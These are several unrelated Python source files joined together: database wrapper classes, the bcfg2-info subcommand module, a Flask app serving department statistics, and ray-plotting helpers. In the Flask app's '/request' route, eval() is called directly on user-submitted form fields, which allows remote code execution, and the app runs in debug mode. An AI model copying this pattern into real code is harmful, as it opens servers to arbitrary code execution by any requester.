except (AttributeError, MySQLdb.OperationalError):
self.connect()
cursor = self.db.cursor()
cursor.execute(sql)
return cursor
def execute_sql(self,sql):
"""
Execute SQL with the opened dbd
"""
self.query(sql)
def fetch_sql(self,sql):
"""
Fetchall instead of commit changes
"""
self.query(sql)
return self.cur.fetchall()
def pandas_sql(self,sql):
print "EXECUTING SQL", sql
df= pd.read_sql(sql, self.db)
if len(df)==0:
print "WARNING: pandas table has 0 rows"
return df
class MongoDB(object):
"""
Interface to pymongo databases
"""
def __init__(self,db,
MONGO_SERVER = '',
MONGO_PORT = 0
):
import pymongo
self.con = pymongo.MongoClient(MONGO_SERVER, MONGO_PORT)
self.db = self.con[db]
def find_one_from_table(self,tbl, key ="_id", val=None):
if val is None:
raise ValueError("Please provide query value")
tbl = self.db[tbl]
return tbl.find_one({key:str(val)})
def find_multi_from_table(self, tbl, key=None, val=None):
if key is None:
return self.db[tbl].find()
else:
if val is None:
raise ValueError("Please provide query value")
tbl = self.db[tbl]
return tbl.find({key:str(val)})
def drop_table(self,tbl):
print "DROPPING TABLE {}".format(tbl)
self.db[tbl].drop()
def insert(self, tbl, query={}):
print "INSERTING TO {}".format(tbl)
self.db[tbl].insert(query)
return
class IDMapperDB(object):
"""
A db layer for id conversion via idmapper.py
"""
def __init__(self,
PORTNUM=0,
HOST=''
):
import os, sys, socket
self.port=PORTNUM
self.host=HOST
def convertIDs (self, ids=None, fromType="OFFICIAL_GENE_SYMBOL", toType="UNIPROT_ACCESSION", species="",
asType="pairs", filterNA=True):
"""
This client code uses the ID mapper server to convert IDs, currently it is mainly useful for
converting various IDs to and from Uniprots
the fromType and toType listings are included above and species only work if the to type is
uniprot and it filters the converted uniprots to validated species specific prots only.
"""
HOST=self.host
PORTNUM=self.port
FROMTYPES=[
"OFFICIAL_GENE_SYMBOL",
"ENTREZ_GENE_ID",
"UNIPROT_ACCESSION",
"UCSC_GENE_ID",
"REFSEQ_MRNA",
"REFSEQ_PROTEIN",
"REFSEQ_NT2",
"REFSEQ_NT",
]
TOTYPES=[
"OFFICIAL_GENE_SYMBOL",
"ENTREZ_GENE_ID",
"UNIPROT_ACCESSION",
"UNIPROT_ACCESSION_SPECIES",
"GO_ACCESSION",
"UCSC_GENE_ID",
"REFSEQ_MRNA",
"REFSEQ_PROTEIN",
"REFSEQ_NT2",
"REFSEQ_NT",
]
SPECIES=[
"MOUSE",
"HUMAN"]
if ids is None:
print "Please input list of ids or text of ids"
return None
if fromType not in FROMTYPES:
print "from type not available, available ones are ", FROMTYPES
return None
if toType not in TOTYPES:
print "to type not available, available ones are ", TOTYPES
return None
if species is not "":
if species not in SPECIES or toType is not "UNIPROT_ACCESSION":
print "Species can only be HUMAN or MOUSE and only when to type is UNIPROT_ACCESSION"
return None
if type(ids)==str:
ids=[i.strip() for i in ids.split("\n") if i.strip()!=""]
ids=[i.split("\t") for i in ids]
ids = [i for j in ids for i in j if i!=""]
#grabs formatted tsv
if type (ids)==list:
ids=[str(i) for i in ids if str(i)!=""]
if species:
cmd = "from "+ fromType + " to " + toType+"_"+species
else:
cmd = "from "+ fromType + " to " + toType
try:
results = []
for _ids in [ids [i:i+100] for i in range(0, len(ids), 100)]:
msg = cmd+ "\n" + "\n".join(_ids)+"\nFIN"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((HOST,PORTNUM))
sock.sendall(msg)
buf=""
while True:
tbuf=sock.recv(4096)
if not tbuf:
break
buf+=tbuf
_results = [(i.split(",")[0],i.split(",")[1]) for i in buf.split("\n") if "," in i]
results += sorted(list(set(_results)))
if filterNA:
results=filter(lambda x: x[1]!="N/A", results)
for i in ids:
if i not in dict(results):
results+=[(i,"NA")]
if asType=="pairs":
pass
elif asType == "tabs":
results = [i.split(",")[0]+"\t"+i.split(",")[1] for i in results]
results = "\n".join(results)
return results
except socket.error as err:
print "Error occured: " + repr(err)
return None
|
# -*- coding: utf-8 -*-
""" Subcommands and helpers for bcfg2-info """
import os
import sys
import cmd
import math
import time
import copy
import pipes
import fnmatch
import argparse
import operator
import lxml.etree
import traceback
from code import InteractiveConsole
import Bcfg2.Logger
import Bcfg2.Options
import Bcfg2.Server.Core
import Bcfg2.Server.Plugin
import Bcfg2.Client.Tools.POSIX
from Bcfg2.Compat import any # pylint: disable=W0622
try:
try:
import cProfile as profile
except ImportError:
import profile
import pstats
HAS_PROFILE = True
except ImportError:
HAS_PROFILE = False
def print_tabular(rows):
"""Print data in tabular format."""
cmax = tuple([max([len(str(row[index])) for row in rows]) + 1
for index in range(len(rows[0]))])
fstring = (" %%-%ss |" * len(cmax)) % cmax
fstring = ('|'.join([" %%-%ss "] * len(cmax))) % cmax
print(fstring % rows[0])
print((sum(cmax) + (len(cmax) * 2) + (len(cmax) - 1)) * '=')
for row in rows[1:]:
print(fstring % row)
def display_trace(trace):
""" display statistics from a profile trace """
stats = pstats.Stats(trace)
stats.sort_stats('cumulative', 'calls', 'time')
stats.print_stats(200)
def load_interpreters():
""" Load a dict of available Python interpreters """
interpreters = dict(python=lambda v: InteractiveConsole(v).interact())
default = "python"
try:
import bpython.cli
interpreters["bpython"] = lambda v: bpython.cli.main(args=[],
locals_=v)
default = "bpython"
except ImportError:
pass
try:
# whether ipython is actually better than bpython is
# up for debate, but this is the behavior that existed
# before --interpreter was added, so we call IPython
# better
import IPython
# pylint: disable=E1101
if hasattr(IPython, "Shell"):
interpreters["ipython"] = lambda v: \
IPython.Shell.IPShell(argv=[], user_ns=v).mainloop()
default = "ipython"
elif hasattr(IPython, "embed"):
interpreters["ipython"] = lambda v: IPython.embed(user_ns=v)
default = "ipython"
else:
print("Unknown IPython API version")
# pylint: enable=E1101
except ImportError:
pass
return (interpreters, default)
class InfoCmd(Bcfg2.Options.Subcommand): # pylint: disable=W0223
""" Base class for bcfg2-info subcommands """
def _expand_globs(self, globs, candidates):
""" Given a list of globs, select the items from candidates
that match the globs """
# special cases to speed things up:
if not globs or '*' in globs:
return candidates
has_wildcards = False
for glob in globs:
# check if any wildcard characters are in the string
if set('*?[]') & set(glob):
has_wildcards = True
break
if not has_wildcards:
return globs
rv = set()
cset = set(candidates)
for glob in globs:
rv.update(c for c in cset if fnmatch.fnmatch(c, glob))
cset.difference_update(rv)
return list(rv)
def get_client_list(self, globs):
""" given a list of host globs, get a list of clients that
match them """
return self._expand_globs(globs, self.core.metadata.clients)
def get_group_list(self, globs):
""" given a list of group glob, get a list of groups that
match them"""
# special cases to speed things up:
return self._expand_globs(globs,
list(self.core.metadata.groups.keys()))
class Debug(InfoCmd):
""" Shell out to a Python interpreter """
interpreters, default_interpreter = load_interpreters()
options = [
Bcfg2.Options.BooleanOption(
"-n", "--non-interactive",
help="Do not enter the interactive debugger"),
Bcfg2.Options.PathOption(
"-f", dest="cmd_list", type=argparse.FileType('r'),
help="File containing commands to run"),
Bcfg2.Options.Option(
"--interpreter", cf=("bcfg2-info", "interpreter"),
env="BCFG2_INFO_INTERPRETER",
choices=interpreters.keys(), default=default_interpreter)]
def run(self, setup):
if setup.cmd_list:
console = InteractiveConsole(locals())
for command in setup.cmd_list.readlines():
console.push(command.rstrip())
if not setup.non_interactive:
print("Dropping to interpreter; press ^D to resume")
self.interpreters[setup.interpreter](self.core.get_locals())
class Build(InfoCmd):
""" Build config for hostname, writing to filename """
options = [Bcfg2.Options.PositionalArgument("hostname"),
Bcfg2.Options.PositionalArgument("filename", nargs='?',
default=sys.stdout,
type=argparse.FileType('w'))]
def run(self, setup):
etree = lxml.etree.ElementTree(
self.core.BuildConfiguration(setup.hostname))
try:
etree.write(
setup.filename,
encoding='UTF-8', xml_declaration=True,
pretty_print=True)
except IOError:
err = sys.exc_info()[1]
print("Failed to write %s: %s" % (setup.filename, err))
class Builddir(InfoCmd):
""" Build config for hostname, writing separate files to directory
"""
# don't try to isntall these types of entries
blacklisted_types = ["nonexistent", "permissions"]
options = Bcfg2.Client.Tools.POSIX.POSIX.options + [
Bcfg2.Options.PositionalArgument("hostname"),
Bcfg2.Options.PathOption("directory")]
help = """Generates a config for client <hostname> and writes the
individual configuration files out separately in a tree under <output
dir>. This only handles file entries, and does not respect 'owner' or
'group' attributes unless run as root. """
def run(self, setup):
setup.paranoid = False
client_config = self.core.BuildConfiguration(setup.hostname)
if client_config.tag == 'error':
print("Building client configuration failed.")
return 1
entries = []
for struct in client_config:
for entry in struct:
if (entry.tag == 'Path' and
entry.get("type") not in self.blacklisted_types):
failure = entry.get("failure")
if failure is not None:
print("Skipping entry %s:%s with bind failure: %s" %
(entry.tag, entry.get("name"), failure))
continue
entry.set('name',
os.path.join(setup.directory,
entry.get('name').lstrip("/")))
entries.append(entry)
Bcfg2.Client.Tools.POSIX.POSIX(client_config).Install(entries)
class Buildfile(InfoCmd):
""" Build config file for hostname """
options = [
Bcfg2.Options.Option("-f", "--outfile", metavar="<path>",
type=argparse.FileType('w'), default=sys.stdout),
Bcfg2.Options.PathOption("--altsrc"),
Bcfg2.Options.PathOption("filename"),
Bcfg2.Options.PositionalArgument("hostname")]
def run(self, setup):
entry = lxml.etree.Element('Path', name=setup.filename)
if setup.altsrc:
entry.set("altsrc", setup.altsrc)
try:
self.core.Bind(entry, self.core.build_metadata(setup.hostname))
except: # pylint: disable=W0702
print("Failed to build entry %s for host %s" % (setup.filename,
setup.hostname))
raise
try:
setup.outfile.write(
lxml.etree.tostring(entry,
xml_declaration=False).decode('UTF-8'))
setup.outfile.write("\n")
except IOError:
err = sys.exc_info()[1]
print("Failed to write %s: %s" % (setup.outfile.name, err))
class BuildAllMixin(object):
""" InfoCmd mixin to make a version of an existing command that
applies to multiple hosts"""
directory_arg = Bcfg2.Options.PathOption("directory")
hostname_arg = Bcfg2.Options.PositionalArgument("hostname", nargs='*',
default=[])
options = [directory_arg, hostname_arg]
@property
def _parent(self):
""" the parent command """
for cls in self.__class__.__mro__:
if (cls != InfoCmd and cls != self.__class__ and
issubclass(cls, InfoCmd)):
return cls
def run(self, setup):
""" Run the command """
try:
os.makedirs(setup.directory)
except OSError:
err = sys.exc_info()[1]
if err.errno != 17:
print("Could not create %s: %s" % (setup.directory, err))
return 1
clients = self.get_client_list(setup.hostname)
for client in clients:
csetup = self._get_setup(client, copy.copy(setup))
csetup.hostname = client
self._parent.run(self, csetup) # pylint: disable=E1101
def _get_setup(self, client, setup):
""" This can be overridden by children to populate individual
setup options on a per-client basis """
raise NotImplementedError
class Buildallfile(Buildfile, BuildAllMixin):
""" Build config file for all clients in directory """
options = [BuildAllMixin.directory_arg,
Bcfg2.Options.PathOption("--altsrc"),
Bcfg2.Options.PathOption("filename"),
BuildAllMixin.hostname_arg]
def run(self, setup):
BuildAllMixin.run(self, setup)
def _get_setup(self, client, setup):
setup.outfile = open(os.path.join(setup.directory, client), 'w')
return setup
class Buildall(Build, BuildAllMixin):
""" Build configs for all clients in directory """
options = BuildAllMixin.options
def run(self, setup):
BuildAllMixin.run(self, setup)
def _get_setup(self, client, setup):
setup.filename = os.path.join(setup.directory, client + ".xml")
return setup
class Buildbundle(InfoCmd):
""" Render a templated bundle for hostname """
options = [Bcfg2.Options.PositionalArgument("bundle"),
Bcfg2.Options.PositionalArgument("hostname")]
def run(self, setup):
bundler = self.core.plugins['Bundler']
bundle = None
if setup.bundle in bundler.entries:
bundle = bundler.entries[setup.bundle]
elif not setup.bundle.endswith(".xml"):
fname = setup.bundle + ".xml"
if fname in bundler.entries:
bundle = bundler.entries[bundle]
if not bundle:
print("No such bundle %s" % setup.bundle)
return 1
try:
metadata = self.core.build_metadata(setup.hostname)
print(lxml.etree.tostring(bundle.XMLMatch(metadata),
xml_declaration=False,
pretty_print=True).decode('UTF-8'))
except: # pylint: disable=W0702
print("Failed to render bundle %s for host %s: %s" %
(setup.bundle, setup.hostname, sys.exc_info()[1]))
raise
class Automatch(InfoCmd):
""" Perform automatch on a Properties file """
options = [
Bcfg2.Options.BooleanOption(
"-f", "--force",
help="Force automatch even if it's disabled"),
Bcfg2.Options.PositionalArgument("propertyfile"),
Bcfg2.Options.PositionalArgument("hostname")]
def run(self, setup):
try:
props = self.core.plugins['Properties']
except KeyError:
print("Properties plugin not enabled")
return 1
pfile = props.entries[setup.propertyfile]
if (not Bcfg2.Options.setup.force and
not Bcfg2.Options.setup.automatch and
pfile.xdata.get("automatch", "false").lower() != "true"):
print("Automatch not enabled on %s" % setup.propertyfile)
else:
metadata = self.core.build_metadata(setup.hostname)
print(lxml.etree.tostring(pfile.XMLMatch(metadata),
xml_declaration=False,
pretty_print=True).decode('UTF-8'))
class ExpireCache(InfoCmd):
""" Expire the metadata cache """
only_interactive = True
options = [
Bcfg2.Options.PositionalArgument(
"hostname", nargs="*", default=[],
help="Expire cache for the given host(s)")]
def run(self, setup):
if setup.hostname:
for client in self.get_client_list(setup.hostname):
self.core.metadata_cache.expire(client)
else:
self.core.metadata_cache.expire()
class EventDebug(InfoCmd):
""" Enable debugging output for FAM events """
only_interactive = True
aliases = ['event_debug']
def run(self, _):
self.core.fam.set_debug(True)
class Bundles(InfoCmd):
""" Print out group/bundle info """
options = [Bcfg2.Options.PositionalArgument("group", nargs='*')]
def run(self, setup):
data = [('Group', 'Bundles')]
groups = self.get_group_list(setup.group)
groups.sort()
for group in groups:
data.append((group,
','.join(self.core.metadata.groups[group][0])))
print_tabular(data)
class Clients(InfoCmd):
""" Print out client/profile info """
options = [Bcfg2.Options.PositionalArgument("hostname", nargs='*',
default=[])]
def run(self, setup):
data = [('Client', 'Profile')]
for client in sorted(self.get_client_list(setup.hostname)):
imd = self.core.metadata.get_initial_metadata(client)
data.append((client, imd.profile))
print_tabular(data)
class Config(InfoCmd):
""" Print out the current configuration of Bcfg2"""
options = [
Bcfg2.Options.BooleanOption(
"--raw",
help="Produce more accurate but less readable raw output")]
def run(self, setup):
parser = Bcfg2.Options.get_parser()
data = [('Description', 'Value')]
for option in parser.option_list:
if hasattr(setup, option.dest):
value = getattr(setup, option.dest)
if any(issubclass(a.__class__,
Bcfg2.Options.ComponentAction)
for a in option.actions.values()):
if not setup.raw:
try:
if option.action.islist:
value = [v.__name__ for v in value]
else:
value = value.__name__
except AttributeError:
# just use the value as-is
pass
if setup.raw:
value = repr(value)
data.append((getattr(option, "help", option.dest), value))
print_tabular(data)
class Probes(InfoCmd):
""" Get probes for the given host """
options = [
Bcfg2.Options.BooleanOption("-p", "--pretty",
help="Human-readable output"),
Bcfg2.Options.PositionalArgument("hostname")]
def run(self, setup):
if setup.pretty:
probes = []
else:
probes = lxml.etree.Element('probes')
metadata = self.core.build_metadata(setup.hostname)
for plugin in self.core.plugins_by_type(Bcfg2.Server.Plugin.Probing):
for probe in plugin.GetProbes(metadata):
probes.append(probe)
if setup.pretty:
for probe in probes:
pname = probe.get("name")
print("=" * (len(pname) + 2))
print(" %s" % pname)
print("=" * (len(pname) + 2))
print("")
print(probe.text)
print("")
else:
print(lxml.etree.tostring(probes, xml_declaration=False,
pretty_print=True).decode('UTF-8'))
class Showentries(InfoCmd):
""" Show abstract configuration entries for a given host """
options = [Bcfg2.Options.PositionalArgument("hostname"),
Bcfg2.Options.PositionalArgument("type", nargs='?')]
def run(self, setup):
try:
metadata = self.core.build_metadata(setup.hostname)
except Bcfg2.Server.Plugin.MetadataConsistencyError:
print("Unable to build metadata for %s: %s" % (setup.hostname,
sys.exc_info()[1]))
structures = self.core.GetStructures(metadata)
output = [('Entry Type', 'Name')]
etypes = None
if setup.type:
etypes = [setup.type, "Bound%s" % setup.type]
for item in structures:
output.extend((child.tag, child.get('name'))
for child in item.getchildren()
if not etypes or child.tag in etypes)
print_tabular(output)
class Groups(InfoCmd):
""" Print out group info """
options = [Bcfg2.Options.PositionalArgument("group", nargs='*')]
def _profile_flag(self, group):
""" Whether or not the group is a profile group """
if self.core.metadata.groups[group].is_profile:
return 'yes'
else:
return 'no'
def run(self, setup):
data = [("Groups", "Profile", "Category")]
groups = self.get_group_list(setup.group)
groups.sort()
for group in groups:
data.append((group,
self._profile_flag(group),
self.core.metadata.groups[group].category))
print_tabular(data)
class Showclient(InfoCmd):
""" Show metadata for the given hosts """
options = [Bcfg2.Options.PositionalArgument("hostname", nargs='*')]
def run(self, setup):
for client in self.get_client_list(setup.hostname):
try:
metadata = self.core.build_metadata(client)
except Bcfg2.Server.Plugin.MetadataConsistencyError:
print("Could not build metadata for %s: %s" %
(client, sys.exc_info()[1]))
continue
fmt = "%-10s %s"
print(fmt % ("Hostname:", metadata.hostname))
print(fmt % ("Profile:", metadata.profile))
group_fmt = "%-10s %-30s %s"
header = False
for group in sorted(list(metadata.groups)):
category = ""
for cat, grp in metadata.categories.items():
if grp == group:
category = "Category: %s" % cat
break
if not header:
print(group_fmt % ("Groups:", group, category))
header = True
else:
print(group_fmt % ("", group, category))
if metadata.bundles:
sorted_bundles = sorted(list(metadata.bundles))
print(fmt % ("Bundles:", sorted_bundles[0]))
for bnd in sorted_bundles[1:]:
print(fmt % ("", bnd))
if metadata.connectors:
print("Connector data")
print("=" * 80)
for conn in metadata.connectors:
if getattr(metadata, conn):
print(fmt % (conn + ":", getattr(metadata, conn)))
print("=" * 80)
class Mappings(InfoCmd):
""" Print generator mappings for optional type and name """
options = [Bcfg2.Options.PositionalArgument("type", nargs='?'),
Bcfg2.Options.PositionalArgument("name", nargs='?')]
def run(self, setup):
data = [('Plugin', 'Type', 'Name')]
for generator in self.core.plugins_by_type(
Bcfg2.Server.Plugin.Generator):
etypes = setup.type or list(generator.Entries.keys())
if setup.name:
interested = [(etype, [setup.name]) for etype in etypes]
else:
interested = [(etype, generator.Entries[etype])
for etype in etypes
if etype in generator.Entries]
for etype, names in interested:
data.extend((generator.name, etype, name)
for name in names
if name in generator.Entries.get(etype, {}))
print_tabular(data)
class PackageResolve(InfoCmd):
""" Resolve packages for the given host"""
options = [Bcfg2.Options.PositionalArgument("hostname"),
Bcfg2.Options.PositionalArgument("package", nargs="*")]
def run(self, setup):
try:
pkgs = self.core.plugins['Packages']
except KeyError:
print("Packages plugin not enabled")
return 1
metadata = self.core.build_metadata(setup.hostname)
indep = lxml.etree.Element("Independent",
name=self.__class__.__name__.lower())
if setup.package:
structures = [lxml.etree.Element("Bundle", name="packages")]
for package in setup.package:
lxml.etree.SubElement(structures[0], "Package", name=package)
else:
structures = self.core.GetStructures(metadata)
pkgs._build_packages(metadata, indep, # pylint: disable=W0212
structures)
print("%d new packages added" % len(indep.getchildren()))
if len(indep.getchildren()):
print(" %s" % "\n ".join(lxml.etree.tostring(p)
for p in indep.getchildren()))
class Packagesources(InfoCmd):
""" Show package sources """
options = [Bcfg2.Options.PositionalArgument("hostname")]
def run(self, setup):
try:
pkgs = self.core.plugins['Packages']
except KeyError:
print("Packages plugin not enabled")
return 1
try:
metadata = self.core.build_metadata(setup.hostname)
except Bcfg2.Server.Plugin.MetadataConsistencyError:
print("Unable to build metadata for %s: %s" % (setup.hostname,
sys.exc_info()[1]))
return 1
print(pkgs.get_collection(metadata).sourcelist())
class Query(InfoCmd):
""" Query clients """
options = [
Bcfg2.Options.ExclusiveOptionGroup(
Bcfg2.Options.Option(
"-g", "--group", metavar="<group>", dest="querygroups",
type=Bcfg2.Options.Types.comma_list),
Bcfg2.Options.Option(
"-p", "--profile", metavar="<profile>", dest="queryprofiles",
type=Bcfg2.Options.Types.comma_list),
Bcfg2.Options.Option(
"-b", "--bundle", metavar="<bundle>", dest="querybundles",
type=Bcfg2.Options.Types.comma_list),
required=True)]
def run(self, setup):
if setup.queryprofiles:
res = self.core.metadata.get_client_names_by_profiles(
setup.queryprofiles)
elif setup.querygroups:
res = self.core.metadata.get_client_names_by_groups(
setup.querygroups)
elif setup.querybundles:
res = self.core.metadata.get_client_names_by_bundles(
setup.querybundles)
print("\n".join(res))
class Quit(InfoCmd):
""" Exit program """
only_interactive = True
aliases = ['exit', 'EOF']
def run(self, _):
raise SystemExit(0)
class Shell(InfoCmd):
""" Open an interactive shell to run multiple bcfg2-info commands """
interactive = False
def run(self, setup):
try:
self.core.cli.cmdloop('Welcome to bcfg2-info\n'
'Type "help" for more information')
except KeyboardInterrupt:
print("\nCtrl-C pressed, exiting...")
class Update(InfoCmd):
""" Process pending filesystem events """
only_interactive = True
def run(self, _):
self.core.fam.handle_events_in_interval(0.1)
class ProfileTemplates(InfoCmd):
""" Benchmark template rendering times """
options = [
Bcfg2.Options.Option(
"--clients", type=Bcfg2.Options.Types.comma_list,
help="Benchmark templates for the named clients"),
Bcfg2.Options.Option(
"--runs", help="Number of rendering passes per template",
default=5, type=int),
Bcfg2.Options.PositionalArgument(
"templates", nargs="*", default=[],
help="Profile the named templates instead of all templates")]
def profile_entry(self, entry, metadata, runs=5):
""" Profile a single entry """
times = []
for i in range(runs): # pylint: disable=W0612
start = time.time()
try:
self.core.Bind(entry, metadata)
times.append(time.time() - start)
except: # pylint: disable=W0702
break
if times:
avg = sum(times) / len(times)
if avg:
self.logger.debug(" %s: %.02f sec" %
(metadata.hostname, avg))
return times
def profile_struct(self, struct, metadata, templates=None, runs=5):
""" Profile all entries in a given structure """
times = dict()
entries = struct.xpath("//Path")
entry_count = 0
for entry in entries:
entry_count += 1
if templates is None or entry.get("name") in templates:
self.logger.info("Rendering Path:%s (%s/%s)..." %
(entry.get("name"), entry_count,
len(entries)))
times.setdefault(entry.get("name"),
self.profile_entry(entry, metadata,
runs=runs))
return times
def profile_client(self, metadata, templates=None, runs=5):
""" Profile all structures for a given client """
structs = self.core.GetStructures(metadata)
struct_count = 0
times = dict()
for struct in structs:
struct_count += 1
self.logger.info("Rendering templates from structure %s:%s "
"(%s/%s)" %
(struct.tag, struct.get("name"), struct_count,
len(structs)))
times.update(self.profile_struct(struct, metadata,
templates=templates, runs=runs))
return times
def stdev(self, nums):
""" Calculate the standard deviation of a list of numbers """
mean = float(sum(nums)) / len(nums)
return math.sqrt(sum((n - mean) ** 2 for n in nums) / float(len(nums)))
def run(self, setup):
clients = self.get_client_list(setup.clients)
times = dict()
client_count = 0
for client in clients:
client_count += 1
self.logger.info("Rendering templates for client %s (%s/%s)" %
(client, client_count, len(clients)))
times.update(self.profile_client(self.core.build_metadata(client),
templates=setup.templates,
runs=setup.runs))
# print out per-file results
tmpltimes = []
for tmpl, ptimes in times.items():
try:
mean = float(sum(ptimes)) / len(ptimes)
except ZeroDivisionError:
continue
ptimes.sort()
median = ptimes[len(ptimes) / 2]
std = self.stdev(ptimes)
if mean > 0.01 or median > 0.01 or std > 1 or setup.templates:
tmpltimes.append((tmpl, mean, median, std))
print("%-50s %-9s %-11s %6s" %
("Template", "Mean Time", "Median Time", "σ"))
for info in reversed(sorted(tmpltimes, key=operator.itemgetter(1))):
print("%-50s %9.02f %11.02f %6.02f" % info)
if HAS_PROFILE:
class Profile(InfoCmd):
""" Profile a single bcfg2-info command """
options = [Bcfg2.Options.PositionalArgument("command"),
Bcfg2.Options.PositionalArgument("args", nargs="*")]
def run(self, setup):
prof = profile.Profile()
cls = self.core.commands[setup.command]
prof.runcall(cls, " ".join(pipes.quote(a) for a in setup.args))
display_trace(prof)
class InfoCore(Bcfg2.Server.Core.Core):
"""Main class for bcfg2-info."""
def __init__(self, cli):
Bcfg2.Server.Core.Core.__init__(self)
self.cli = cli
def get_locals(self):
""" Expose the local variables of the core to subcommands that
need to reference them (i.e., the interactive interpreter) """
return locals()
def run(self):
self.load_plugins()
self.block_for_fam_events(handle_events=True)
def _run(self):
pass
def _block(self):
pass
def shutdown(self):
Bcfg2.Server.Core.Core.shutdown(self)
class CLI(cmd.Cmd, Bcfg2.Options.CommandRegistry):
""" The bcfg2-info CLI """
options = [Bcfg2.Options.BooleanOption("-p", "--profile", help="Profile")]
def __init__(self):
cmd.Cmd.__init__(self)
Bcfg2.Options.CommandRegistry.__init__(self)
self.prompt = 'bcfg2-info> '
self.register_commands(globals().values(), parent=InfoCmd)
parser = Bcfg2.Options.get_parser(
description="Inspect a running Bcfg2 server",
components=[self, InfoCore])
parser.add_options(self.subcommand_options)
parser.parse()
if Bcfg2.Options.setup.profile and HAS_PROFILE:
prof = profile.Profile()
self.core = prof.runcall(InfoCore)
display_trace(prof)
else:
if Bcfg2.Options.setup.profile:
print("Profiling functionality not available.")
self.core = InfoCore(self)
for command in self.commands.values():
command.core = self.core
def run(self):
""" Run bcfg2-info """
try:
if Bcfg2.Options.setup.subcommand != 'help':
self.core.run()
return self.runcommand()
finally:
self.shutdown()
def shutdown(self):
Bcfg2.Options.CommandRegistry.shutdown(self)
self.core.shutdown()
def get_names(self):
""" Overwrite cmd.Cmd.get_names to use the instance to get the
methods and not the class, because the CommandRegistry
dynamically adds methods for the registed subcommands. """
return dir(self)
def onecmd(self, line):
""" Overwrite cmd.Cmd.onecmd to catch all exceptions (except
SystemExit) print an error message and continue cmdloop. """
try:
cmd.Cmd.onecmd(self, line)
except SystemExit:
raise
except: # pylint: disable=W0702
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value,
exc_traceback)
self.stdout.write(''.join(lines))
|
from flask import Flask, render_template, request, json
import numpy as np
import pandas as pd
MyApp = Flask(__name__)
df = pd.read_csv('static/data/master_ho_v2.csv');
def getUni(df, fed, col):
mean_cols = ['ndip_n', 'nent_n', 'nequ_n']
if fed == 'all':
if col in mean_cols:
return df[['department', col]].groupby('department').mean().reset_index().rename(columns={col:'result'})
else:
return df[['department', col]].groupby('department').sum().reset_index().rename(columns={col:'result'})
temp = df.query('fedecode=='+str(fed))[['department', col]].copy(deep=True).reset_index(drop=True)
return temp.rename(columns={col:'result'})
def test_df(df, department):
return df[df.department == int(department)].head(1).region.values[0]
def getRatio(df, fed, cols):
if fed == 'all':
ndf = df[['department']+cols].copy(deep=True)
temp = df[['department']+cols].groupby('department').sum().reset_index()
temp['result'] = temp[cols[0]]/temp[cols[1]]*100
return temp.reset_index(drop=True)[['department', 'result']]
else:
ndf = df.query('fedecode=='+str(fed))[['department']+cols].copy(deep=True)
ndf['result'] = ndf[cols[0]]/df[cols[1]]*100
return ndf[['department', 'result']]
def getCorr(df, cols):
temp = df.groupby('department')[cols].corr()[cols[0]].reset_index().query('level_1==\''+cols[1]+'\'').reset_index()[['department', cols[0]]]
temp = temp.rename(columns={cols[0] : 'result'})
return temp
def to_dict(df):
#converts a pandas.DataFrame to a dictionary
if 'department' in df.columns:
tmp = df.set_index('department').to_dict()['result']
elif 'fed' in df.columns:
tmp = df.set_index(df.columns[0]).to_dict()['result']
return str({str(k):v for k, v in tmp.iteritems()}).replace("'", '"')
def getDf(df, var1, metric, fed=None, var2=None):
if metric == 'uni':
return getUni(df, fed, var1)
if metric == 'ratio':
return getRatio(df, fed, [var1, var2])
if metric == 'corr':
return getCorr(df, [var1, var2])
@MyApp.route('/')
def home():
return render_template('index.html', title = 'Home')
@MyApp.route('/request', methods=['POST', 'GET'])
def request__():
var1 =str(eval(request.form['var1']))
var2 =str(eval(request.form['var2']))
method =str(eval(request.form['method']))
fede =str(eval(request.form['fede']))
df_temp = getDf(df, var1, method, fed=fede, var2=var2)
df_temp.index.name = 'id'
df_temp.to_csv("static/data/tempfile.csv")
json_file = df_temp.to_json(orient='records')
return json.dumps({'status':'OK','answer':'response', 'var1':var1, 'var2':var2, 'method':method, 'fede':fede, 'data':json_file})
if __name__ == "__main__":
MyApp.run(debug=True)
|
import matplotlib.pyplot as plt
import numpy as np
def plot2d(rays, sli='xz'):
def plot_ray(ray):
ra = np.concatenate([np.atleast_3d(ri.p0) for ri in ray], 2)
#ra = np.array([ri.p0 for ri in ray])
if not ray[-1].p1 == None:
ra = np.concatenate([ra, np.atleast_3d(ray[-1].p1)], 2)
if sli == 'xz':
plt.plot(ra[:, 2,:].squeeze().T, ra[:, 0,:].squeeze().T, c=ray[0].color)
elif sli == 'zx':
plt.plot(ra[:, 0, :].squeeze().T, ra[:, 2, :].squeeze().T, c=ray[0].color)
elif sli == 'xy':
plt.plot(ra[:, 1, :].squeeze().T, ra[:, 0, :].squeeze().T, c=ray[0].color)
for ray in rays:
plot_ray(ray)
def plot_system2d(sys, sli='xz'):
if sli == 'xz':
def plot_surf(s):
sf = s.surface(proj='y')
plt.plot(sf[2], sf[0], 'k')
if sli == 'zx':
def plot_surf(s):
sf = s.surface(proj='y')
plt.plot(sf[0], sf[2], 'k')
if sli == 'xy':
def plot_surf(s):
sf = s.surface(proj='z')
plt.plot(sf[1], sf[0], 'k')
if sli == 'yx':
def plot_surf(s):
sf = s.surface(proj='z')
plt.plot(sf[0], sf[1], 'k')
for s in sys:
plot_surf(s)
def dotplt(rays):
NA = max([np.sin(np.arccos(np.dot(rays[-1].d[0], d_i))) for d_i in rays[-1].d[1:]])
#print(rays[-1].d[0])
#print([np.sin(np.arccos(np.dot(rays[-1].d[0], d_i))) for d_i in rays[-1].d[1:]])
#print(rays[-1])
#print(NA)
xh = np.cross(rays[-1].d[0], rays[-1].d[1])
yh = np.cross(xh, rays[-1].d[0])
xh = xh/np.linalg.norm(xh)
yh = yh/np.linalg.norm(yh)
r_dl = rays[-1].wavelength * 1e-6 / (2 * NA)
pts = rays[-1].p0 #np.array([r_i[-1].p0 for r_i in rays])
x1 = (pts*xh[None,:]).sum(1)
y1 = (pts * yh[None, :]).sum(1)
plt.plot(x1 -x1.mean(), y1 - y1.mean(), '.')
t = np.linspace(0, 2 * np.pi)
plt.plot(r_dl * np.sin(t), r_dl * np.cos(t))
plt.axis('equal')
#xlim(-.06, .06)
plt.ylim(-r_dl*3, r_dl*3) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on Apr 4, 2020
.. codeauthor: svitlana vakulenko
<svitlana.vakulenko@gmail.com>
Transformer for sequence classification with a message-passing layer
'''
